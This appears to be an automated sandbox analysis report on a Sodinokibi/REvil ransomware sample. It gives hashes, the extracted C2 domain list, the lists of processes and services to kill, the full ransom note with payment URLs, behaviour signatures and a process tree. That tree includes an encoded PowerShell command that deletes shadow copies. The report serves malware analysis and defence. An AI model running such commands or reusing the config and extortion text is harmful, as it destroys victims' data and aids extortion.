Analysis

  • max time kernel
    171s
  • max time network
    169s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:41

General

  • Target

    843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe

  • Size

    207KB

  • MD5

    d9f89f4c741bb2bd29f0a375962b838e

  • SHA1

    9d314af0037bfa0ae8fee3cdc1454796de7476ae

  • SHA256

    843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0

  • SHA512

    8d5b1a30b4a79ab8f44266c01e815688a336aac27bb5db8d14e3b18fdb299a9dde8c3d0eeeea1e04faa9925e25790159c50e5311e1d68189f84775ef52bc20cd

Malware Config

Extracted

Path

C:\g73ndx739-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion g73ndx739. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/37CA594BBE0E22B7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/37CA594BBE0E22B7 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: /9OlTGfJfdMhtKG7h0WfPozuHVBbva2FW1Q12jDh/D3ipYCP0IYC0oi0MJDU5iBi jgDfmtgrrZkID7P2OOa7YW+conX3jSVt8RNihCDu7HUdnskoAZDvvxZlc8bZDnbW dPM5JRcH1RwxnFIsi2uPX5YDDPdFKG6zO0SVwckxRq6Dx7ZevtI8ImFSAAjQ7JrG 4MUizMPFOzZFLdmqwYDyTznTq6xUDojd81PzTi0j6+Fo3U3VePVFJzwXJn5RK6TY XV8ljY02RpKh/RCH9fKIUpHRBFzOO7QynAeEUxjglR6lg1+En2QBMmqUVOJGzBzp E7NElTHAgPJmaHCvr1tshMuogwQxP400NANaQxu7/XvlCBSkPUJhzRXN/wJWM4bt r5XfJGIT6RtMDjePykoLGur/aDzTNAUvrFOp6maM2yxHStFWCmXH8ATMqwBUrc7G intYpXpQFdzopK0eyNst9NjImSz78HOlFe4q+LcUTH5nVy/VQ5Jh6baNOeD7kdr2 wx9aA8eeXTepfMiEd9JZQLtUYtomS4dGzOzAvF92aywsu/wD6ZH4Whojy85X6utw yWO27ajd+Qo1hgHM0Bl5H/D5LzsWIqufF0iVmWz/4Vsz9PrPe5DGTUg3YEUM9aUx QIU4PLvRbFfByV4+8S77aKhJrbG6mvplGRuwquQQMA0JvLkxO27DBXmofeyY4UkG M/RRzzsjm7MtFIN83btzLwKaR5eMMI6BboK87s4rT7WW+LBxJfmmOPfbpCQgd6GM FySC+IxnHUsgD/8siLqX8NWISbe6M+LV73wVHvpzFdVVNdJo8XhJTPd7Dgq1BgoX zOFq8RWJgHWEKN4kk+QbOqcARAca6jbEh3xKq1GJejB8g/VLllMxnW6+z/ID/9F5 lqeXMBXAc+63D10+/oF09VIxRlG7h0V68elqPoUnqgof+L6E5VmBGdfsdbU6TWDi sKTBaukWB4S7AlkHPVAVR5naSQf7wqJObu5EEkCbGZvUovdFiyCs5ZAUbYv+HtLD 7Dwy8C0PvQ6Op5DNId3sdilneYredh8vkJWPuEer2egg1O6Hl+OpeLjQDdv1PqP2 iJKya4sLjrEtJPl9uT+yP0uwQzSvPzuOwdNdfd3lidhyY6p1EsujAIrUXyJkfwxm DfDc8a15Nju+Ol3m0dgqJppsSTLIS27IDg3egQOAve7n8fqLb7J89DvB6gpGT/Id e3SjzWh/BdKXnWdW4qOVile9rllJFOJFMDsE5Y9erCQqFOTv+Cn5giOFQMLZ6O9s 0B31fN0qXE3XQkwMyyv2O1jn6iucfA== Extension name: g73ndx739 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/37CA594BBE0E22B7

http://decryptor.cc/37CA594BBE0E22B7

Extracted

Family

sodinokibi

Botnet

$2a$10$68XDJqNysd88BgVGYrJ7PO1MhEgkwxGhBfpAuTPWzBbc53gtZZK62

Campaign

1428

C2

marathonerpaolo.com

danubecloud.com

dirittosanitario.biz

1kbk.com.ua

moveonnews.com

bestbet.com

projetlyonturin.fr

www1.proresult.no

musictreehouse.net

ligiercenter-sachsen.de

effortlesspromo.com

theduke.de

xn--fn-kka.no

artallnightdc.com

celeclub.org

xn--thucmctc-13a1357egba.com

schmalhorst.de

carlosja.com

renergysolution.com

cleliaekiko.online

Attributes
  • net

    true

  • pid

    $2a$10$68XDJqNysd88BgVGYrJ7PO1MhEgkwxGhBfpAuTPWzBbc53gtZZK62

  • prc

    thebat64

    mydesktopqos

    winword

    outlook

    infopath

    dbsnmp

    mysqld_nt

    synctime

    mysqld_opt

    mspub

    ocssd

    steam

    thunderbird

    msaccess

    sqlwriter

    excel

    msftesql

    agntsvc

    sqlbrowser

    encsvc

    thebat

    firefoxconfig

    wordpad

    onenote

    visio

    sqlagent

    dbeng50

    sqbcoreservice

    ocomm

    isqlplussvc

    mysqld

    xfssvccon

    oracle

    powerpnt

    sqlservr

    tbirdconfig

    ocautoupds

    mydesktopservice

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    1428

  • svc

    svc$

    vss

    sql

    memtas

    backup

    mepocs

    veeam

    sophos

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe
    "C:\Users\Admin\AppData\Local\Temp\843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe"
    1⤵
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3516
    • C:\Users\Admin\AppData\Local\Temp\3582-490\843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:360
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:772
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1460

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe
      MD5

      575e4054867ef734ef53eff38d3277d7

      SHA1

      a762b86ef5ce9849b0f15641811c20291d588b5f

      SHA256

      cb33f3d60a715436ab49ab7968c5a31410d0cd6b9d141b41b2362c02b59e2913

      SHA512

      07f0cf5c753346bddb89b756da93a360806963470ba48089f57a4646b861bb466127f9ca9b49d110132a710b5cbf1c8dcf6d73dd0b48bc0957121ce406961d9a

    • C:\Users\Admin\AppData\Local\Temp\3582-490\843c781fa1d426f2112e53367ea18dbddb41b7d8b243519c3bb47d16256064e0.exe
      MD5

      575e4054867ef734ef53eff38d3277d7

      SHA1

      a762b86ef5ce9849b0f15641811c20291d588b5f

      SHA256

      cb33f3d60a715436ab49ab7968c5a31410d0cd6b9d141b41b2362c02b59e2913

      SHA512

      07f0cf5c753346bddb89b756da93a360806963470ba48089f57a4646b861bb466127f9ca9b49d110132a710b5cbf1c8dcf6d73dd0b48bc0957121ce406961d9a

    • memory/360-124-0x00000243F2190000-0x00000243F21B2000-memory.dmp
      Filesize

      136KB

    • memory/360-127-0x00000243F2520000-0x00000243F2596000-memory.dmp
      Filesize

      472KB

    • memory/360-128-0x00000243F2410000-0x00000243F2412000-memory.dmp
      Filesize

      8KB

    • memory/360-129-0x00000243F2413000-0x00000243F2415000-memory.dmp
      Filesize

      8KB